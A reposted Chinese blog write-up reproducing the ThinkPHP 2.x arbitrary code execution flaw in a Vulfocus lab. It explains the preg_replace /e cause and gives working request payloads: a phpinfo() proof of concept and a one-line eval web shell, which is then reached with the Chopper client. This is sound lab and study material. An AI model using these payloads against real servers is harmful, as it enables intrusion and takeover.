首页 > Web开发 > 详细

thinkphp2.x任意代码执行漏洞复现

时间:2021-08-08 11:27:04      阅读:31      评论:0      收藏:0      [点我收藏+]

 

 

Thinkphp2.x 任意代码执行漏洞

 

影响版本:tp2.x   tp3.0

 

漏洞影响:代码执行,写入一句话getshell

 

漏洞成因:在 ThinkPHP ThinkPHP 2.x 版本中,使用 preg_replace 的 /e 模式匹配路由:

$res = preg_replace(‘@(\w+)‘.$depr.‘([^‘.$depr.‘\/]+)@e‘, ‘$var[\‘\\1\‘]="\\2";‘, implode($depr,$paths))

导致用户的输入参数被插入双引号中执行,造成任意代码执行漏洞。

 

直接在Vulfocus集成靶场中进行复现。
打开靶场
 技术分享图片

 

 


利用POC验证,执行phpinfo()
/index.php?s=/index/index/xxx/${@phpinfo()}
 技术分享图片

 

 


然后试着写入一句话木马
/index.php?s=/index/index/xxx/${${@eval($_POST[123])}}
 技术分享图片

 

 


可以看到页面报错同时把thinkphp的版本也爆出,接着用菜刀连接
 技术分享图片

 

 


拿到shell

 

 

Thinkphp2.x 任意代码执行漏洞

thinkphp2.x任意代码执行漏洞复现

原文:https://www.cnblogs.com/noob199/p/15113761.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!